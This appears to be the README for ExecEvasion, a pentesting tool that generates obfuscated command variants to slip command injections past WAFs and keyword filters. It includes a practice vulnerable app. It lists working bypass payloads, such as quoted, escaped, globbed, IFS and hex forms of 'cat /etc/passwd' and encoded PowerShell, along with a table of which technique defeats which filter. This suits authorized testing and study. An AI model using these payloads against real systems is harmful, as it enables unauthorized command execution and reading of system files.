When
cat /etc/passwdgets blocked, butc''at /e''tc/pa''sswddoesn't.
A command obfuscation toolkit for pentesters, bug bounty hunters, CTF players, and anyone who's ever been frustrated by a WAF.
You found a command injection. Nice. You try to read /etc/passwd. Blocked. You try whoami. Blocked. The WAF is doing its job.
But here's the thing — shells are weird. They do strange things with quotes, backslashes, and variables. And most filters don't account for that.
ExecEvasion generates 50+ obfuscated versions of your command using 18 different techniques. One of them will probably work.
No npm. No pip. No docker. Just open index.html in your browser. That's it.
This is also live at https://dr34mhacks.github.io/ExecEvasion/
Enter a command. Get variations like:
# Original
cat /etc/passwd
# What ExecEvasion generates
c'a't /etc/passwd # Quote insertion
c\at /etc/passwd # Backslash escape
c[a]t /etc/passwd # Glob pattern
c$@at /etc/passwd # Variable expansion
a=cat;b=/etc/passwd;$a $b # Command split into variables then expandedAll of these execute cat /etc/passwd. Most filters only catch the first one.
| Technique | Example | When to use |
|---|---|---|
| Glob Patterns | c[a]t |
Keyword blacklists |
| Quote Insertion | c''a''t |
Simple string matching |
| Backslash Escape | c\a\t |
Regex-based filters |
| Variable Expansion | c$@at |
When $ isn't blocked |
| Concatenation | a=c;b=at;$a$b |
Multi-command allowed |
| Hex | $'\x63\x61\x74' |
When nothing else works |
| Wildcards | /e*/passwd |
Path blacklists |
| Brace Expansion | {cat,/etc/passwd} |
Space filters |
| IFS | cat${IFS}/etc/passwd |
Space blocked |
| Technique | Example | When to use |
|---|---|---|
| Caret Escape | w^h^o^a^m^i |
CMD keyword filters |
| Quotes | who""ami |
Simple matching |
| Env Substrings | %COMSPEC:~0,1% |
Build from nothing |
| PowerShell Base64 | powershell -e <b64> |
Heavy filtering |
| Char Codes | [char[]](119,104,111) |
String blocked |
Testing a target that blocks cat, passwd, and etc? Enter them in the blocked strings field. ExecEvasion marks which payloads avoid those strings.
No more guessing.
I included a vulnerable web app so you can practice:
cd challenge
pip install flask
python app.py
# Open http://127.0.0.1:5000It's a "secure" ping utility with WAF protection. Your job: read /tmp/flag.txt.
The filter blocks the obvious stuff. Use ExecEvasion to find what works.
-
Bug Bounty Hunters — That RCE you found is useless if you can't prove impact. Bypass the filter, read the file, write the report.
-
Pentesters — Client has a WAF? Good. Now show them why signature-based blocking isn't enough.
-
CTF Players — Stop manually trying quote variations. Generate them all. Find what works. Get the flag.
-
Security Researchers — Study how different obfuscation techniques evade different filter types.
-
Red Teamers — Test detection capabilities. See what their SOC catches and what slips through.
The docs.html page explains why each technique works:
- How shell parsing differs from filter parsing
- When specific techniques succeed or fail
- ASCII/hex reference tables
- Troubleshooting common issues
Understanding the "why" helps you adapt when pre-built payloads don't work.
ExecEvasion/
├── index.html # Main generator (just open this)
├── docs.html # Technical documentation
├── challenge/ # Practice vulnerable app
│ ├── app.py
│ └── README.md
├── LICENSE
└── README.md
This tool is for:
- Authorized penetration testing
- Bug bounty programs (with scope permission)
- CTF competitions
- Security research
- Educational purposes
Using this against systems you don't have permission to test is illegal. Don't be that person.
Built by Sid Joshi
If this helped you pop a shell or find a bug, consider starring the repo.
"The best filter bypass is the one the filter author didn't think of."